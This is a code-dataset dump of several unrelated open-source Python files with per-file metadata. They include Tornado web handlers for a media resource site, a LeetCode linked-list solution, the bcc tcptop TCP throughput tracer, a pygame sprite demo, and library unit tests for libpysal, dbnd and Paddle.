    """Return the list of banned client IPs."""

    class_name = f"Blacklist{adapter}Resource"

    # from Mongo import BlacklistMongoResource
    # instance = BlacklistMongoResource()

    @run_on_executor()
    def get_black_list(self):
        return self.instance.get_black_list()

    @gen.coroutine
    def get(self):
        resp = yield self.get_black_list()
        self.write(resp)
class NotFoundHandler(BaseHandler):
    def get(self):  # for react app
        # Unknown routes fall through to the SPA shell so that client-side
        # routing can handle them.
        self.render(index)
class DBDumpHandler(BaseHandler):
    """Report checksum/date/size metadata for the downloadable database dumps."""

    @staticmethod
    def sizeof_fmt(num: int, suffix='B'):
        """Render a byte count as a human-readable binary-prefixed string."""
        for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
            if abs(num) < 1024.0:
                return "%3.1f%s%s" % (num, unit, suffix)
            num /= 1024.0
        return "%.1f%s%s" % (num, 'Yi', suffix)

    @staticmethod
    def ts_date(ts):
        # POSIX timestamp -> "YYYY-MM-DD HH:MM:SS" in local time.
        return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(ts))

    def file_info(self, file_path) -> dict:
        """Map each path to [sha1, creation date, human size]; on failure the
        error message takes the checksum slot and the other fields are empty."""
        result = {}
        for fp in file_path:
            try:
                checksum = self.checksum(fp)
                creation = self.ts_date(os.stat(fp).st_ctime)
                size = self.sizeof_fmt(os.stat(fp).st_size)
                result[fp] = [checksum, creation, size]
            except Exception as e:
                result[fp] = str(e), "", ""
        return result

    @staticmethod
    def checksum(file_path) -> str:
        """SHA-1 of the whole file; the file is read into memory in one go."""
        sha = sha1()
        try:
            with open(file_path, "rb") as f:
                sha.update(f.read())
                checksum = sha.hexdigest()
        except Exception as e:
            checksum = str(e)

        return checksum

    @run_on_executor()
    @Redis.cache(3600)
    def get_hash(self):
        # Cached for an hour: hashing the dumps is expensive.
        file_list = [
            "templates/data/yyets_mongo.gz",
            "templates/data/yyets_mysql.zip",
            "templates/data/yyets_sqlite.zip"
        ]
        result = {}
        data = self.file_info(file_list)
        for file, value in data.items():
            filename = os.path.basename(file)
            result[filename] = {
                "checksum": value[0],
                "date": value[1],
                "size": value[2],
            }

        return result

    @gen.coroutine
    def get(self):
        resp = yield self.get_hash()
        self.write(resp)
class DoubanHandler(BaseHandler):
    """Serve douban metadata for a resource; ?type=image returns the poster."""

    class_name = f"Douban{adapter}Resource"

    # from Mongo import DoubanMongoResource
    # instance = DoubanMongoResource()

    @run_on_executor()
    def douban_data(self):
        rid = self.get_query_argument("resource_id")
        data = self.instance.get_douban_data(int(rid))
        # The raw poster bytes are served separately via ?type=image.
        data.pop("posterData")
        return data

    def get_image(self) -> bytes:
        rid = self.get_query_argument("resource_id")
        return self.instance.get_douban_image(int(rid))

    @gen.coroutine
    def get(self):
        _type = self.get_query_argument("type", None)
        if _type == "image":
            data = self.get_image()
            # Sniff the actual image type from the bytes for the content-type.
            self.set_header("content-type", filetype.guess_mime(data))
            self.write(data)
        else:
            resp = yield self.douban_data()
            self.write(resp)
class DoubanReportHandler(BaseHandler):
    """Accept (POST) and list (GET) user reports about wrong douban metadata."""

    class_name = f"DoubanReport{adapter}Resource"

    # from Mongo import DoubanReportMongoResource
    # instance = DoubanReportMongoResource()

    @run_on_executor()
    def get_error(self):
        return self.instance.get_error()

    @run_on_executor()
    def report_error(self):
        """Validate the captcha and store one error report.

        Bug fix: the original called ``instance.report_error`` twice — once to
        read the status code and again for the return value — which stored the
        report twice; the single result is now reused.
        """
        data = self.json
        user_captcha = data["captcha_id"]
        captcha_id = data["id"]
        content = data["content"]
        resource_id = data["resource_id"]
        returned = self.instance.report_error(user_captcha, captcha_id, content, resource_id)
        status_code = returned.get("status_code", HTTPStatus.CREATED)
        self.set_status(status_code)
        return returned

    @gen.coroutine
    def post(self):
        resp = yield self.report_error()
        self.write(resp)

    @gen.coroutine
    def get(self):
        resp = yield self.get_error()
        self.write(resp)
class NotificationHandler(BaseHandler):
    """List the current user's notifications and mark them read/unread."""

    class_name = f"Notification{adapter}Resource"

    # from Mongo import NotificationResource
    # instance = NotificationResource()

    @run_on_executor()
    def get_notification(self):
        username = self.get_current_user()
        size = int(self.get_argument("size", "5"))
        page = int(self.get_argument("page", "1"))
        return self.instance.get_notification(username, page, size)

    @run_on_executor()
    def update_notification(self):
        # verb must be "read" or "unread"; anything else is a client error.
        username = self.get_current_user()
        verb = self.json["verb"]
        comment_id = self.json["comment_id"]
        if verb not in ["read", "unread"]:
            self.set_status(HTTPStatus.BAD_REQUEST)
            return {"status": False, "message": "verb: read or unread"}
        self.set_status(HTTPStatus.CREATED)
        return self.instance.update_notification(username, verb, comment_id)

    @gen.coroutine
    @web.authenticated
    def get(self):
        resp = yield self.get_notification()
        self.write(resp)

    @gen.coroutine
    @web.authenticated
    def patch(self):
        resp = yield self.update_notification()
        self.write(resp)
class UserEmailHandler(BaseHandler):
    """Confirm the current user's e-mail address with a verification code."""

    class_name = f"UserEmail{adapter}Resource"

    # from Mongo import UserEmailResource
    # instance = UserEmailResource()

    @run_on_executor()
    def verify_email(self):
        result = self.instance.verify_email(self.get_current_user(), self.json["code"])
        self.set_status(result.get("status_code"))
        return result

    @gen.coroutine
    @web.authenticated
    def post(self):
        resp = yield self.verify_email()
        self.write(resp)
class CategoryHandler(BaseHandler):
    """Browse resources by category with pagination and optional douban data."""

    class_name = f"Category{adapter}Resource"
    # NOTE(review): unlike the sibling handlers, this one imports the Mongo
    # implementation unconditionally, bypassing the adapter selection above —
    # confirm this is intentional (it will break under the SQLite adapter).
    from Mongo import CategoryResource
    instance = CategoryResource()

    @run_on_executor()
    def get_data(self):
        # Fold all query arguments into self.json, normalizing the known ones.
        self.json = {k: self.get_argument(k) for k in self.request.arguments}
        self.json["size"] = int(self.json.get("size", 15))
        self.json["page"] = int(self.json.get("page", 1))
        self.json["douban"] = self.json.get("douban", False)
        return self.instance.get_category(self.json)

    @gen.coroutine
    def get(self):
        resp = yield self.get_data()
        self.write(resp)
| 30.076148 | 119 | 0.627113 |
f1518de746aa823bafcd534f1a182c0d9465f9ce | 850 | py | Python | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | """
21. Merge Two Sorted Lists
https://leetcode.com/problems/merge-two-sorted-lists/
"""
# Definition for singly-linked list.
class ListNode:
    """One node of a singly linked list: a value and a next pointer."""

    def __init__(self, val=0, next=None):
        self.val, self.next = val, next
class Solution:
    def mergeTwoLists(self, list1: "Optional[ListNode]", list2: "Optional[ListNode]") -> "Optional[ListNode]":
        """Merge two sorted singly linked lists into one sorted list.

        Nodes are relinked in place; no new value nodes are allocated beyond
        the dummy head. The annotations are quoted because ``typing.Optional``
        is not imported in this file — unquoted, they raised NameError at
        class-definition time.
        """
        dummy = ListNode()  # sentinel so the head case needs no special-casing
        tail = dummy
        p, q = list1, list2
        while p and q:
            if p.val < q.val:
                tail.next, p = p, p.next
            else:
                tail.next, q = q, q.next
            tail = tail.next
        # At most one list is non-empty here; append the remainder (or None).
        tail.next = p or q
        return dummy.next
def main():
    """Demo entry point: merge [1,2,4] and [1,3,4] and print the result.

    Bug fix: the original called ``s.xxx()``, a method that does not exist on
    ``Solution``, so running the script raised AttributeError.
    """
    def build(vals):
        # Build a linked list from a Python list (front to back).
        head = None
        for v in reversed(vals):
            head = ListNode(v, head)
        return head

    s = Solution()
    node = s.mergeTwoLists(build([1, 2, 4]), build([1, 3, 4]))
    out = []
    while node:
        out.append(node.val)
        node = node.next
    print(out)  # -> [1, 1, 2, 3, 4, 4]


if __name__ == '__main__':
    raise(SystemExit(main()))
| 19.318182 | 104 | 0.497647 |
2d4b7572ecca73027bd482cf0fa94446cfcb48af | 10,077 | py | Python | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcptop Summarize TCP send/recv throughput by host.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcptop [-h] [-C] [-S] [-p PID] [interval [count]]
#
# This uses dynamic tracing of kernel functions, and will need to be updated
# to match kernel changes.
#
# WARNING: This traces all send/receives at the TCP level, and while it
# summarizes data in-kernel to reduce overhead, there may still be some
# overhead at high TCP send/receive rates (eg, ~13% of one CPU at 100k TCP
# events/sec. This is not the same as packet rate: funccount can be used to
# count the kprobes below to find out the TCP rate). Test in a lab environment
# first. If your send/receive rate is low (eg, <1k/sec) then the overhead is
# expected to be negligible.
#
# ToDo: Fit output to screen size (top X only) in default (not -C) mode.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 02-Sep-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
import argparse
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
from time import sleep, strftime
from subprocess import call
from collections import namedtuple, defaultdict
# arguments
def range_check(string):
    """argparse ``type=`` callable: parse *string* as an int and require >= 1.

    Raises argparse.ArgumentTypeError for zero or negative values so argparse
    reports a clean usage error. Also fixes the "stricly" typo in the
    user-facing message.
    """
    value = int(string)
    if value < 1:
        msg = "value must be strictly positive, got %d" % (value,)
        raise argparse.ArgumentTypeError(msg)
    return value
examples = """examples:
./tcptop # trace TCP send/recv by host
./tcptop -C # don't clear the screen
./tcptop -p 181 # only trace PID 181
./tcptop --cgroupmap ./mappath # only trace cgroups in this BPF map
"""
parser = argparse.ArgumentParser(
description="Summarize TCP send/recv throughput by host",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-C", "--noclear", action="store_true",
help="don't clear the screen")
parser.add_argument("-S", "--nosummary", action="store_true",
help="skip system summary line")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("interval", nargs="?", default=1, type=range_check,
help="output interval, in seconds (default 1)")
parser.add_argument("count", nargs="?", default=-1, type=range_check,
help="number of outputs")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# linux stats
loadavg = "/proc/loadavg"
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
struct ipv4_key_t {
u32 pid;
u32 saddr;
u32 daddr;
u16 lport;
u16 dport;
};
BPF_HASH(ipv4_send_bytes, struct ipv4_key_t);
BPF_HASH(ipv4_recv_bytes, struct ipv4_key_t);
struct ipv6_key_t {
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u16 lport;
u16 dport;
};
BPF_HASH(ipv6_send_bytes, struct ipv6_key_t);
BPF_HASH(ipv6_recv_bytes, struct ipv6_key_t);
#if CGROUPSET
BPF_TABLE_PINNED("hash", u64, u64, cgroupset, 1024, "CGROUPPATH");
#endif
int kprobe__tcp_sendmsg(struct pt_regs *ctx, struct sock *sk,
struct msghdr *msg, size_t size)
{
u32 pid = bpf_get_current_pid_tgid() >> 32;
FILTER
#if CGROUPSET
u64 cgroupid = bpf_get_current_cgroup_id();
if (cgroupset.lookup(&cgroupid) == NULL) {
return 0;
}
#endif
u16 dport = 0, family = sk->__sk_common.skc_family;
if (family == AF_INET) {
struct ipv4_key_t ipv4_key = {.pid = pid};
ipv4_key.saddr = sk->__sk_common.skc_rcv_saddr;
ipv4_key.daddr = sk->__sk_common.skc_daddr;
ipv4_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv4_key.dport = ntohs(dport);
ipv4_send_bytes.increment(ipv4_key, size);
} else if (family == AF_INET6) {
struct ipv6_key_t ipv6_key = {.pid = pid};
bpf_probe_read(&ipv6_key.saddr, sizeof(ipv6_key.saddr),
&sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read(&ipv6_key.daddr, sizeof(ipv6_key.daddr),
&sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
ipv6_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv6_key.dport = ntohs(dport);
ipv6_send_bytes.increment(ipv6_key, size);
}
// else drop
return 0;
}
/*
* tcp_recvmsg() would be obvious to trace, but is less suitable because:
* - we'd need to trace both entry and return, to have both sock and size
* - misses tcp_read_sock() traffic
* we'd much prefer tracepoints once they are available.
*/
int kprobe__tcp_cleanup_rbuf(struct pt_regs *ctx, struct sock *sk, int copied)
{
u32 pid = bpf_get_current_pid_tgid() >> 32;
FILTER
#if CGROUPSET
u64 cgroupid = bpf_get_current_cgroup_id();
if (cgroupset.lookup(&cgroupid) == NULL) {
return 0;
}
#endif
u16 dport = 0, family = sk->__sk_common.skc_family;
u64 *val, zero = 0;
if (copied <= 0)
return 0;
if (family == AF_INET) {
struct ipv4_key_t ipv4_key = {.pid = pid};
ipv4_key.saddr = sk->__sk_common.skc_rcv_saddr;
ipv4_key.daddr = sk->__sk_common.skc_daddr;
ipv4_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv4_key.dport = ntohs(dport);
ipv4_recv_bytes.increment(ipv4_key, copied);
} else if (family == AF_INET6) {
struct ipv6_key_t ipv6_key = {.pid = pid};
bpf_probe_read(&ipv6_key.saddr, sizeof(ipv6_key.saddr),
&sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read(&ipv6_key.daddr, sizeof(ipv6_key.daddr),
&sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
ipv6_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv6_key.dport = ntohs(dport);
ipv6_recv_bytes.increment(ipv6_key, copied);
}
// else drop
return 0;
}
"""
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('FILTER',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('FILTER', '')
if args.cgroupmap:
bpf_text = bpf_text.replace('CGROUPSET', '1')
bpf_text = bpf_text.replace('CGROUPPATH', args.cgroupmap)
else:
bpf_text = bpf_text.replace('CGROUPSET', '0')
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
TCPSessionKey = namedtuple('TCPSession', ['pid', 'laddr', 'lport', 'daddr', 'dport'])
def pid_to_comm(pid):
    """Best-effort: resolve *pid* to its process name via /proc/<pid>/comm,
    falling back to the pid as a string when the file cannot be read.

    Fix: the original left the file handle open; ``with`` closes it promptly
    instead of relying on garbage collection.
    """
    try:
        with open("/proc/%d/comm" % pid, "r") as f:
            return f.read().rstrip()
    except IOError:
        return str(pid)
def get_ipv4_session_key(k):
    # Convert the kernel-side ipv4_key_t (integer addresses) into a printable
    # TCPSessionKey with dotted-quad addresses.
    return TCPSessionKey(pid=k.pid,
                         laddr=inet_ntop(AF_INET, pack("I", k.saddr)),
                         lport=k.lport,
                         daddr=inet_ntop(AF_INET, pack("I", k.daddr)),
                         dport=k.dport)
def get_ipv6_session_key(k):
    # Convert the kernel-side ipv6_key_t (128-bit addresses) into a printable
    # TCPSessionKey with textual IPv6 addresses.
    return TCPSessionKey(pid=k.pid,
                         laddr=inet_ntop(AF_INET6, k.saddr),
                         lport=k.lport,
                         daddr=inet_ntop(AF_INET6, k.daddr),
                         dport=k.dport)
# initialize BPF
b = BPF(text=bpf_text)
ipv4_send_bytes = b["ipv4_send_bytes"]
ipv4_recv_bytes = b["ipv4_recv_bytes"]
ipv6_send_bytes = b["ipv6_send_bytes"]
ipv6_recv_bytes = b["ipv6_recv_bytes"]
print('Tracing... Output every %s secs. Hit Ctrl-C to end' % args.interval)
# output
i = 0
exiting = False
while i != args.count and not exiting:
try:
sleep(args.interval)
except KeyboardInterrupt:
exiting = True
# header
if args.noclear:
print()
else:
call("clear")
if not args.nosummary:
with open(loadavg) as stats:
print("%-8s loadavg: %s" % (strftime("%H:%M:%S"), stats.read()))
# IPv4: build dict of all seen keys
ipv4_throughput = defaultdict(lambda: [0, 0])
for k, v in ipv4_send_bytes.items():
key = get_ipv4_session_key(k)
ipv4_throughput[key][0] = v.value
ipv4_send_bytes.clear()
for k, v in ipv4_recv_bytes.items():
key = get_ipv4_session_key(k)
ipv4_throughput[key][1] = v.value
ipv4_recv_bytes.clear()
if ipv4_throughput:
print("%-6s %-12s %-21s %-21s %6s %6s" % ("PID", "COMM",
"LADDR", "RADDR", "RX_KB", "TX_KB"))
# output
for k, (send_bytes, recv_bytes) in sorted(ipv4_throughput.items(),
key=lambda kv: sum(kv[1]),
reverse=True):
print("%-6d %-12.12s %-21s %-21s %6d %6d" % (k.pid,
pid_to_comm(k.pid),
k.laddr + ":" + str(k.lport),
k.daddr + ":" + str(k.dport),
int(recv_bytes / 1024), int(send_bytes / 1024)))
# IPv6: build dict of all seen keys
ipv6_throughput = defaultdict(lambda: [0, 0])
for k, v in ipv6_send_bytes.items():
key = get_ipv6_session_key(k)
ipv6_throughput[key][0] = v.value
ipv6_send_bytes.clear()
for k, v in ipv6_recv_bytes.items():
key = get_ipv6_session_key(k)
ipv6_throughput[key][1] = v.value
ipv6_recv_bytes.clear()
if ipv6_throughput:
# more than 80 chars, sadly.
print("\n%-6s %-12s %-32s %-32s %6s %6s" % ("PID", "COMM",
"LADDR6", "RADDR6", "RX_KB", "TX_KB"))
# output
for k, (send_bytes, recv_bytes) in sorted(ipv6_throughput.items(),
key=lambda kv: sum(kv[1]),
reverse=True):
print("%-6d %-12.12s %-32s %-32s %6d %6d" % (k.pid,
pid_to_comm(k.pid),
k.laddr + ":" + str(k.lport),
k.daddr + ":" + str(k.dport),
int(recv_bytes / 1024), int(send_bytes / 1024)))
i += 1
| 32.401929 | 85 | 0.628262 |
f22c073970b181796df511e591af946f9ffbc9dd | 1,195 | py | Python | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | import unittest
from ...fileio import FileIO as psopen
from ..dat import DatIO
from .... import examples as pysal_examples
import tempfile
import os
class test_DatIO(unittest.TestCase):
    """Read/seek/write round-trip tests for the DAT spatial-weights format."""

    def setUp(self):
        test_file = pysal_examples.get_path("wmat.dat")
        self.test_file = test_file
        self.obj = DatIO(test_file, "r")

    def test_close(self):
        reader = self.obj
        reader.close()
        # A closed reader must refuse further reads.
        with self.assertRaises(ValueError):
            reader.read()

    def test_read(self):
        w = self.obj.read()
        self.assertEqual(w.n, 49)
        self.assertEqual(w.mean_neighbors, 4.7346938775510203)
        self.assertEqual(list(w[5.0].values()), [0.5, 0.5])

    def test_seek(self):
        self.test_read()
        # The file is exhausted after one read ...
        with self.assertRaises(StopIteration):
            self.obj.read()
        # ... but seeking back to the start makes it readable again.
        self.obj.seek(0)
        self.test_read()

    def test_write(self):
        w = self.obj.read()
        handle = tempfile.NamedTemporaryFile(suffix=".dat")
        fname = handle.name
        handle.close()
        writer = psopen(fname, "w")
        writer.write(w)
        writer.close()
        round_tripped = psopen(fname, "r").read()
        self.assertEqual(round_tripped.pct_nonzero, w.pct_nonzero)
        os.remove(fname)
# Allow direct execution of this test module: python test_dat.py
if __name__ == "__main__":
    unittest.main()
| 25.978261 | 72 | 0.609205 |
461daf837402df13de840b1c692fbdc7f747b923 | 921 | py | Python | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | import pandas as pd
from pandas import DataFrame
from dbnd import pipeline, task
from dbnd_examples.data import data_repo
class TestDocTasksPipelinesData:
    """Smoke-tests for the task/pipeline code snippets embedded in the docs.

    The '#### DOC START' / '#### DOC END' comments presumably mark the span
    that is extracted into the documentation -- keep them intact.
    """

    def test_pipelines(self):
        """Define a two-step pipeline and run it once against sample data."""
        #### DOC START
        @task
        def prepare_data(data: pd.DataFrame) -> pd.DataFrame:
            return data

        @task
        def train_model(data: pd.DataFrame) -> object:
            ...

        @pipeline
        def prepare_data_pipeline(data: pd.DataFrame):
            prepared_data = prepare_data(data)
            model = train_model(prepared_data)
            return model

        #### DOC END
        # Execute the pipeline once with the bundled wine dataset.
        prepare_data_pipeline.dbnd_run(data_repo.wines)

    def test_data(self):
        """Define a single DataFrame-mutating task and run it once."""
        #### DOC START
        @task
        def prepare_data(data: DataFrame) -> DataFrame:
            data["new_column"] = 5
            return data

        #### DOC END
        prepare_data.dbnd_run(data=data_repo.wines)
| 24.236842 | 61 | 0.602606 |
2a419057ed32d0d72a2ab5830767804b84e6235c | 2,259 | py | Python | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | # This was built from the tutorial https://www.raywenderlich.com/24252/beginning-game-programming-for-teens-with-python
# NOTE(review): Python 2 source -- see the `print crframes` statement and the
# integer divisions in the tile loops below.
import pygame, math, random
from pygame.locals import *
import pyganim

# 2 - Initialize the game
pygame.init()
width, height = 640, 480
screen=pygame.display.set_mode((width, height))
pygame.display.set_caption('PyGame - Testing')

# Asset roots (relative to the working directory).
rootImg = "resources/images/basic_game/"
rootAud = "resources/audio/basic_game/"

player = pygame.image.load(rootImg + "dude.png")
grass = pygame.image.load(rootImg + "grass.png")
castle = pygame.image.load(rootImg + "castle.png").convert_alpha()
# cow = pygame.image.load("resources/images/animals/cow/cow_front.png") #subject to change

# Used https://github.com/asweigart/pyganim/tree/master/examples
# http://www.pygame.org/project-Pyganim+sprite+animation+module-2106-.html
# for the sprite sheets
# Front-facing cow: 4x2 sprite sheet, 100 ms per frame.
cows = pyganim.getImagesFromSpriteSheet(
    filename="resources/images/animals/cow/cow_front.png",
    rows=4, cols=2,
    scale=2)
cframes = list(zip(cows, [100] * len(cows)))
cowObj = pyganim.PygAnimation(cframes)
cowObj.play()

# Rear-facing cow: 3x3 sprite sheet.
cowsr = pyganim.getImagesFromSpriteSheet(
    filename="resources/images/animals/cow/cow_rear.png",
    rows=3, cols=3,
    scale=2)
crframes = list(zip(cowsr, [100] * len(cowsr)))
# crframes = crframes.pop()#remove blank frame
print crframes
cowrObj = pyganim.PygAnimation(crframes)
cowrObj.play()

# 4 - keep looping through
running = 1
while running:
    # 5 - clear the screen before drawing it again
    screen.fill(0)
    # 6 - draw the screen elements
    # NOTE(review): tiles are blitted on a hard-coded 100px step rather than
    # grass.get_width()/get_height() -- confirm the tile really is 100x100.
    for x in range(width/grass.get_width()+1):
        for y in range(height/grass.get_height()+1):
            screen.blit(grass,(x*100,y*100))
    cowObj.blit(screen, (200, 20))
    cowrObj.blit(screen, (50, 200))
    # screen.blit(castle, (100,100))
    # 7 - update the screen
    pygame.display.flip()
    # 8 - loop through the events
    for event in pygame.event.get():
        # check if the event is the X button
        if event.type==pygame.QUIT:
            # if it is quit the game
            pygame.quit()
            exit(0)

# NOTE(review): unreachable -- the loop above never clears `running` and only
# exits the process via exit(0).
while 1:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            exit(0)
    pygame.display.flip()
b621cb59c0ed009598f40990176147fe3f91b518 | 4,522 | py | Python | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 8 | 2016-08-15T07:02:27.000Z | 2016-08-24T09:34:00.000Z | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 1 | 2022-01-28T07:23:22.000Z | 2022-01-28T07:23:22.000Z | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 1 | 2022-03-02T11:36:03.000Z | 2022-03-02T11:36:03.000Z | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import sys
sys.path.append("..")
import paddle
from op_test import OpTest
from op_test_xpu import XPUOpTest
from xpu.get_test_cover_info import create_test_class, get_xpu_op_support_types, XPUOpTestWrapper
paddle.enable_static()
class XPUTestReduceProdOP(XPUOpTestWrapper):
    """reduce_prod operator tests for XPU.

    The nested classes are turned into concrete TestCases by
    create_test_class() at the bottom of the module, once per supported
    dtype -- keep their names and nesting intact.
    """

    def __init__(self):
        self.op_name = 'reduce_prod'
        self.use_dynamic_create_class = False

    class TestXPUReduceProdOp(XPUOpTest):
        """Base case; subclasses override initTestCase() for other shapes."""

        def setUp(self):
            self.place = paddle.XPUPlace(0)
            self.init_dtype()
            self.op_type = 'reduce_prod'
            self.use_mkldnn = False
            self.keep_dim = False
            self.reduce_all = False
            self.initTestCase()
            self.attrs = {
                'dim': self.axis,
                'keep_dim': self.keep_dim,
                'reduce_all': self.reduce_all
            }
            self.inputs = {'X': np.random.random(self.shape).astype(self.dtype)}
            # Reference output computed with numpy's prod.
            if self.attrs['reduce_all']:
                self.outputs = {'Out': self.inputs['X'].prod()}
            else:
                self.outputs = {
                    'Out': self.inputs['X'].prod(
                        axis=self.axis, keepdims=self.attrs['keep_dim'])
                }

        def initTestCase(self):
            # shape/axis hook, overridden by the subclasses below
            self.shape = (5, 6, 10)
            self.axis = (0, )

        def init_dtype(self):
            # in_type is injected by the XPU test-type machinery
            self.dtype = self.in_type

        def test_check_output(self):
            self.check_output_with_place(self.place)

        def test_check_grad(self):
            self.check_grad_with_place(self.place, ['X'], 'Out')

    class TestProdOp5D(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (1, 2, 5, 6, 10)
            self.axis = (0, )

    class TestProdOp6D(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (1, 1, 2, 5, 6, 10)
            self.axis = (0, )

    class TestProdOp8D(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (1, 3, 1, 2, 1, 4, 3, 10)
            self.axis = (0, 3)

    class Test1DReduce(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = 120
            self.axis = (0, )

    class Test2DReduce0(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (20, 10)
            self.axis = (0, )

    class Test2DReduce1(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (20, 10)
            self.axis = (1, )

    class Test3DReduce0(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (5, 6, 7)
            self.axis = (1, )

    class Test3DReduce1(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (5, 6, 7)
            self.axis = (2, )

    class Test3DReduce2(TestXPUReduceProdOp):
        def initTestCase(self):
            # negative axis
            self.shape = (5, 6, 7)
            self.axis = (-2, )

    class Test3DReduce3(TestXPUReduceProdOp):
        def initTestCase(self):
            # multi-axis reduction
            self.shape = (5, 6, 7)
            self.axis = (1, 2)

    class TestKeepDimReduce(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (5, 6, 10)
            self.axis = (1, )
            self.keep_dim = True

    class TestKeepDim8DReduce(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (2, 5, 3, 2, 2, 3, 4, 2)
            self.axis = (3, 4, 5)
            self.keep_dim = True

    class TestReduceAll(TestXPUReduceProdOp):
        def initTestCase(self):
            self.shape = (5, 6, 2, 10)
            self.axis = (0, )
            self.reduce_all = True
# Register one concrete TestCase per dtype the XPU reduce_prod kernel supports.
support_types = get_xpu_op_support_types('reduce_prod')
for stype in support_types:
    create_test_class(globals(), XPUTestReduceProdOP, stype)

if __name__ == '__main__':
    unittest.main()
| 30.761905 | 97 | 0.591331 |
